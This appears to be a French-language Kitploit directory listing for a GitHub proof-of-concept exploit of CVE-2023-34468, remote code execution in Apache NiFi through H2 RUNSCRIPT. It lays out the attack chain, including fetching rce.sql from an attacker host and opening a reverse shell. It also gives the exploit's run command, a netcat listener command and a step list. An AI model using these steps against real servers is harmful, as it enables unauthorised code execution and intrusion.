Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-34468-POC — Exploit PoC pour CVE-2023-34468 — RCE via H2 RUNSCRIPT dans Apache NiFi <= 1.21.0 | Kitploit
Outils/GitHubGitHub/sbouabid-sec/cve-2023-34468-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubsbouabid-sec/cve-2023-34468-poc

CVE-2023-34468-POC

Exploit PoC pour CVE-2023-34468 — RCE via H2 RUNSCRIPT dans Apache NiFi <= 1.21.0

Voir le dépôt
4il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-34468 — Apache NiFi 1.21.0 RCE PoC

Exécution de code à distance via H2 Database RUNSCRIPT dans Apache NiFi <= 1.21.0


Vulnérabilité

Apache NiFi est livré avec un JAR de base de données H2 inclus par défaut. Le service de contrôle DBCPConnectionPool peut être configuré pour utiliser ce pilote H2. H2 prend en charge une instruction RUNSCRIPT qui récupère et exécute un fichier SQL depuis une URL distante. Ce fichier SQL peut définir du code Java arbitraire via CREATE ALIAS et l'exécuter sur le système d'exploitation du serveur.

Chaîne d'attaque :

root@kitploit:~
DBCPConnectionPool (H2 driver)
    → ExecuteSQL processor
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java method)
                → CALL SHELLEXEC (reverse shell)

Versions concernées

LogicielVersion
Apache NiFi<= 1.21.0
Corrigé dans1.21.1+
JavaToute (fournie)

Prérequis

  • Python 3.x
  • Bibliothèque requests → pip install requests
  • Cible NiFi avec accès en écriture anonyme OU des identifiants valides
  • Accès réseau depuis la cible vers votre machine (pour la connexion de retour du shell inversé)

Utilisation

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

Arguments


Mise en place

Terminal 1 — listener :

root@kitploit:~
nc -lvnp 4444

Terminal 2 — exploit :

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

Ce que fait le PoC

root@kitploit:~
Step 1  Check anonymous access and write permissions
Step 2  Get root Process Group ID
Step 3  Create malicious DBCPConnectionPool controller service
Step 4  Enable the controller service (handles revision versioning)
Step 5  Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6  Start the processor → NiFi fetches rce.sql → shell callback
Step 7  Cleanup (if --cleanup flag is set)
Télécharger l’outil
ArgumentDéfautDescription
--targethttp://NiFi.target.comURL de base de la cible NiFi
--lhost10.10.10.10Votre IP (tun0)
--lport4444Port d'écoute du shell inversé
--http-port80Port pour servir rce.sql
--cleanupFalseSupprimer les artefacts créés après exécution